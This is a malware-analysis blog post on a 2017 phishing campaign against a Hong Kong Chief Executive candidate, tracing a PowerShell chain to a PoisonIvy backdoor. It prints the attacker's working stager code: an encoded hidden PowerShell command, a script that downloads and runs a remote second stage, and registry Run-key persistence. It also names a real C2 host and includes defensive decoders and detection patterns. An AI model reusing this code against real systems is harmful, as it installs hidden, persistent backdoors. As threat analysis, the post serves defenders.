On 1 March 2017, one of the candidates in the Hong Kong Chief Executive election received a phishing e-mail, sent from a Gmail account, that invited the target to fill in a survey form. We received the report on 9 March 2017.

Technical Analysis

Game Begins with Multiple Encoding

Clicking the link downloads an .lnk file, which in turn redirects to a page under geocities.jp that serves an encoded VBScript (a .wsc Windows Script Component) at the following URL:

hxxp://www.geocities.jp/vbiayay1/<xxxxx>0301.wsc

Exhibit 1

After decoding the VBScript encoding, we obtain the following command line, which starts a hidden PowerShell with the execution policy bypassed and passes it a Base64-encoded command:

powershell.exe -w hidden -ep bypass -Enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwANAAoAJABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQBbAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwANAAoAJABuAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAHYAYgBpAGEAeQBhAHkAMQAvAE0AZQBlAHQAaQBuAGcAXwBzAHUAbQBtAGEAcgB5AC4AZABvAGMAIgAsACIAJABlAG4AdgA6AHQAZQBtAHAAXABNAGUAZQB0AGkAbgBnAF8AcwB1AG0AbQBhAHIAeQAuAGQAbwBjACIAKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAE0AZQBlAHQAaQBuAGcAXwBzAHUAbQBtAGEAcgB5AC4AZABvAGMAIgANAAoASQBFAFgAIAAkAG4ALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAHYAYgBpAGEAeQBhAHkAMQAvAGoAbwBoAG4AdABzADAAMwAwADEALgBwAHMAMQAnACkAOwANAAoA

Base64-decoding the -Enc argument (PowerShell expects the decoded bytes to be UTF-16LE, which is why every other character of the blob is "A") gives the following script. It downloads a decoy document [masked].doc to %TEMP%, opens it for the victim, and then fetches a second PowerShell script, [masked]0301.ps1, and runs it in memory with IEX:

$n=new-object net.webclient;
# Use the system proxy with the logged-on user's credentials so the download also works behind a corporate proxy
$n.proxy=[Net.WebRequest]::GetSystemWebProxy();
$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
# Drop the decoy document in %TEMP% and open it so the victim sees something plausible
$n.DownloadFile("http://www.geocities.jp/vbiayay1/<xxxxx>.doc","$env:temp\<xxxxx>.doc");
Start-Process "$env:temp\Meeting_summary.doc"
# Fetch the second-stage script and execute it in memory; nothing is written to disk
IEX $n.downloadstring('http://www.geocities.jp/vbiayay1/<0301masked>.ps1');
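The two Base64 layers above use different text encodings, which trips up a naive decoder: the -Enc argument is Base64 over UTF-16LE, while the inner stage (below) is decoded with [Text.Encoding]::ASCII. The following decoder is an added example, not code from the original post. The only real data in it is the first 80 characters of the -Enc blob quoted above; the longer stage-1 script is constructed to mirror the decoded one and uses placeholder file names (decoy.doc, stage2.ps1) in place of the masked ones.

```python
"""Peel the encoding layers used by the stager quoted above (added example)."""
import base64
import re

# The first 80 characters of the -Enc blob quoted on the page (real data).
ENC_PREFIX = "JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwANAAoA"

# Constructed stage-1 script mirroring the decoded one; file names are placeholders.
SAMPLE_STAGE1 = (
    "$n=new-object net.webclient;\r\n"
    '$n.DownloadFile("http://www.geocities.jp/vbiayay1/decoy.doc","$env:temp\\decoy.doc");\r\n'
    'Start-Process "$env:temp\\decoy.doc"\r\n'
    "IEX $n.downloadstring('http://www.geocities.jp/vbiayay1/stage2.ps1');\r\n"
)

# powershell.exe accepts several spellings of the encoded-command switch.
ENC_ARG_RE = re.compile(r"-(?:EncodedCommand|Enc|Ec|E)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"(),]+", re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """Decode a powershell.exe -Enc argument.

    PowerShell expects Base64 over UTF-16LE text, not ASCII.  Every other
    byte of the decoded blob is therefore 0x00, which is what produces the
    'A' in every fourth position of the string on the page."""
    return base64.b64decode(blob).decode("utf-16-le")


def encode_encoded_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ascii_base64(blob: str) -> str:
    """Decode the inner layer the second stage pulls from the registry.  That
    stage uses [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(..)),
    so the same blob would come out as garbage if decoded as UTF-16LE."""
    return base64.b64decode(blob).decode("ascii")


def peel(cmdline: str) -> list:
    """Decode every -Enc layer reachable from a command line, outermost first.
    Nested layers (a decoded script that itself launches powershell -Enc) are
    followed until none remain."""
    layers = []
    pending = [cmdline]
    while pending:
        text = pending.pop(0)
        for m in ENC_ARG_RE.finditer(text):
            try:
                decoded = decode_encoded_command(m.group(1))
            except (ValueError, UnicodeDecodeError):
                continue  # not a real -Enc payload (e.g. "-e" followed by a word)
            layers.append(decoded)
            pending.append(decoded)
    return layers


def extract_urls(script: str) -> list:
    """Download and IEX targets from a decoded script, deduplicated, in order."""
    urls = []
    for u in URL_RE.findall(script):
        if u not in urls:
            urls.append(u)
    return urls


if __name__ == "__main__":
    cmd = "powershell.exe -w hidden -ep bypass -Enc " + encode_encoded_command(SAMPLE_STAGE1)
    for i, layer in enumerate(peel(cmd), 1):
        print(f"--- layer {i} ---\n{layer}")
        print("URLs:", extract_urls(layer))
```

Run it on a real command line captured from Sysmon or 4688 logs by replacing the constructed cmd; decode_encoded_command alone is enough to confirm that a blob with the "A" pattern is a UTF-16LE -Enc payload.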

The [masked]0301.ps1 script is shown below. It stores a further Base64-encoded stage in the registry value HKCU:\Console\FontSecurity, runs it immediately through cmd.exe, and persists it under the user's Run key as SecurityUpdate. Note that both branches end up in a 32-bit PowerShell (the SysWOW64 copy on 64-bit Windows, the System32 copy on 32-bit Windows), which the 32-bit shellcode in the later stage requires. We then decode the content of $code:

# True when this PowerShell is a 32-bit process on 64-bit Windows (WOW64)
$is64= $PSHOME.Contains("SysWOW64");
$code = [BASE64 ENCODED STRING];

# Stash the Base64 stage in an innocuous-looking registry value
Set-ItemProperty "HKCU:\Console\" -Name FontSecurity -Value $code;
# Either test being true means the OS is 64-bit, so use the WOW64 (32-bit) binaries
if ($is64 -or ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8))
{
        # Run the stage now from a hidden 32-bit cmd.exe/powershell.exe ...
        Start-Process -windowstyle Hidden -FilePath "$env:windir\syswow64\cmd.exe" -ArgumentList "/c powershell.exe -noprofile -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))";
        # ... and persist it in the user's Run key under the name SecurityUpdate
        Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\" -Name SecurityUpdate -Value "$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe -w hidden -ep Bypass -nologo -noprofile iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))";
}else
{
        # 32-bit Windows: System32 already holds the 32-bit binaries
        Start-Process -windowstyle Hidden -FilePath "$env:windir\system32\cmd.exe" -ArgumentList "/c powershell.exe -noprofile -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))";
        Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\" -Name SecurityUpdate -Value "$env:windir\system32\WindowsPowerShell\v1.0\powershell.exe -w hidden -ep Bypass -nologo -noprofile iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))";
}

Decoding $code yields another PowerShell script, which in turn carries a further encoded string in the variable $Shellcode32; the decoded script is reproduced in the Appendix.
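The persistence above leaves two artefacts that are easy to check for during incident response: a Run value whose command line is a PowerShell one-liner with the execution policy bypassed, and a Base64 string parked in an unrelated key (HKCU\Console). The following triage script is an added example, not code from the original post. It parses a "reg export" text dump, flags Run entries that match the stager's pattern, and follows the (gp 'HKCU:\...').Name reference back to the stored value so the stage can be decoded offline. The .reg sample is constructed; the value names FontSecurity and SecurityUpdate and the Run command line are the ones shown on the page, and the stored payload is a placeholder.

```python
"""Triage registry persistence of the kind used by the second stage (added example)."""
import base64
import re

# Constructed second-stage payload; in the real sample this is the decoded $code.
STAGE2 = "Write-Host 'stage 2 (constructed)'"
STAGE2_B64 = base64.b64encode(STAGE2.encode("ascii")).decode("ascii")

# The Run command line from the page, escaped the way "reg export" writes it (\\ for \).
RUN_CMD = (
    r"C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -ep Bypass "
    r"-nologo -noprofile iex ([Text.Encoding]::ASCII.GetString("
    r"[Convert]::FromBase64String((gp 'HKCU:\\console').FontSecurity)))"
)

# Constructed .reg export: one benign Run entry, one from the stager, plus the parked stage.
REG_SAMPLE = (
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_CURRENT_USER\\Console]\r\n"
    f'"FontSecurity"="{STAGE2_B64}"\r\n\r\n'
    "[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n"
    f'"SecurityUpdate"="{RUN_CMD}"\r\n'
    '"OneDrive"="C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe /background"\r\n'
)

VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
RUN_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
}
# Each indicator alone is common; the stager's command line hits all of them.
SUSPICIOUS = [
    (re.compile(r"powershell(?:\.exe)?", re.I), "launches PowerShell"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "bypasses execution policy"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "Invoke-Expression of generated text"),
    (re.compile(r"FromBase64String", re.I), "Base64-decoded payload"),
    (re.compile(r"\\syswow64\\", re.I), "forces 32-bit PowerShell on a 64-bit host"),
]
GP_REF = re.compile(r"\((?:gp|Get-ItemProperty)\s+'HKCU:\\([^']+)'\)\.(\w+)", re.I)


def _unescape(s: str) -> str:
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text: str) -> dict:
    """Minimal parser for 'reg export' output: {key: {name: REG_SZ value}}.
    dword:/hex: values are ignored because the stager only uses strings."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = VALUE_RE.match(line)
            if m:
                keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def find_suspicious_run_entries(keys: dict) -> list:
    """(value name, command, reasons) for Run entries with at least two indicators."""
    findings = []
    for key, values in keys.items():
        if key.lower() not in RUN_KEYS:
            continue
        for name, cmd in values.items():
            reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
            if len(reasons) >= 2:
                findings.append((name, cmd, reasons))
    return findings


def resolve_registry_payload(keys: dict, cmd: str):
    """Follow (gp 'HKCU:\\path').Name in a command back to the parked value and
    decode it the way the stager does (ASCII over Base64).  None if no reference."""
    m = GP_REF.search(cmd)
    if not m:
        return None
    target = ("hkey_current_user\\" + m.group(1)).lower()
    for key, values in keys.items():
        if key.lower() == target:
            for vname, vdata in values.items():
                if vname.lower() == m.group(2).lower():
                    return base64.b64decode(vdata).decode("ascii")
    return None


if __name__ == "__main__":
    reg = parse_reg_export(REG_SAMPLE)
    for name, cmd, reasons in find_suspicious_run_entries(reg):
        print(f"{name}: {', '.join(reasons)}")
        print("  parked stage:", resolve_registry_payload(reg, cmd))
```

On a live host, feed it the output of "reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run" together with "reg export HKCU\Console"; the same parser also works on exports taken from a mounted forensic image with an offline registry tool.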

C2 Server in Korea

As mentioned in the previous section, we dumped the content of the variable $Shellcode32. This is the final payload: a shellcode that the PowerShell script injects into a process.

We disassembled it in IDA Pro and identified the following routine.

Exhibit 2

We identified the decoding routine and decoded the embedded payload using the key 0xE9 against 0x2183:

Once decoded, the configuration reveals the C2 domain and IP address web.outlooksysm.net / 61.97.243.15, hosted at a VPS provider in Korea.
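The post reports the key 0xE9 but not how it is applied. The script below is an added example, not code from the original post: it assumes the common single-byte XOR scheme and, rather than trusting a key read off the disassembly, brute-forces all 256 candidates and scores each by whether the output contains a hostname with a known TLD or a valid dotted-quad, so the key and the C2 strings fall out together. The "shellcode" is constructed: a few x86 prologue bytes and padding around the page's C2 domain and IP, encoded with 0xE9; the NUL terminators are an assumption about the config layout.

```python
"""Recover a single-byte-XOR-obfuscated C2 config from a shellcode blob (added example)."""
import re

# Constructed config: the C2 strings the page recovered, NUL-terminated (assumed layout).
KEY = 0xE9  # the key reported on the page; used only to build the sample
CONFIG_PLAINTEXT = b"web.outlooksysm.net\x0061.97.243.15\x00"


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key for b in data)


# Constructed "shellcode": an x86 prologue, a call, the encoded config, a return.
SHELLCODE = (
    b"\x55\x8b\xec\x83\xec\x10"          # push ebp; mov ebp,esp; sub esp,0x10
    + b"\xe8\x00\x00\x00\x00"            # call $+5 (get-EIP trick)
    + xor_bytes(CONFIG_PLAINTEXT, KEY)   # obfuscated configuration
    + b"\xc3" + b"\x90" * 8              # ret; padding
)

HOST_RE = re.compile(rb"(?:[a-z0-9-]+\.)+(?:com|net|org|info|jp|kr)\b", re.I)
IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def score_candidate(decoded: bytes):
    """Rank a decode attempt: network indicators first, printable bytes as tie-break."""
    hosts = HOST_RE.findall(decoded)
    ips = [ip for ip in IPV4_RE.findall(decoded)
           if all(int(o) <= 255 for o in ip.split(b"."))]
    printable = sum(0x20 <= b < 0x7F for b in decoded)
    return (len(hosts) + len(ips), printable), hosts, ips


def recover_c2(blob: bytes):
    """Try every single-byte key; return (key, hostnames, ipv4s) for the best-scoring one."""
    best = None
    for key in range(256):
        s, hosts, ips = score_candidate(xor_bytes(blob, key))
        if best is None or s > best[0]:
            best = (s, key, [h.decode() for h in hosts], [i.decode() for i in ips])
    _, key, hosts, ips = best
    return key, hosts, ips


if __name__ == "__main__":
    key, hosts, ips = recover_c2(SHELLCODE)
    print(f"key=0x{key:02x} hosts={hosts} ips={ips}")
```

Against a real dump, pass the bytes of $Shellcode32 (or the memory region Volatility extracted) as the blob; if the best score is zero the obfuscation is something other than single-byte XOR and the disassembly is the only reliable guide.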

Exhibit 3

Footprint of PoisonIvy

The padding around the C2 strings in the shellcode matches the findings reported by Arbor [1].

The highlighted bytes below also match the PoisonIvy signature used by the Volatility plugin, so we conclude that the backdoor is communicating with a PoisonIvy command-and-control server.

Exhibit 4

Exhibit 5

The following malware samples were also found to have communicated with the same domain/IP in the past:

Incident Response and Campaign Discovery

We notified our contacts so that Geocities Japan could take down the page, and in doing so they discovered further APT campaigns hosted there that follow a similar naming convention:

hxxp://www.geocities.jp/vbiayay1/<xxxxx><dddd>.wsc

Summary

The PowerShell scripts borrow their process injector from the open-source PowerSploit project on GitHub. Obfuscated tooling of this kind is rarely seen in attacks against Hong Kong targets, even though the obfuscation here amounts to little more than several layers of Base64, a basic encoding scheme.

Acknowledgement and Credit

We are grateful to Matt Brooks for his assistance with the analysis and to Rick from MalwareMustDie for the takedown action with Geocities.jp.

Reference

  1. Arbor Networks, Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider with PoisonIvy

  2. Analysis from 0Day.jp



Anthony Lai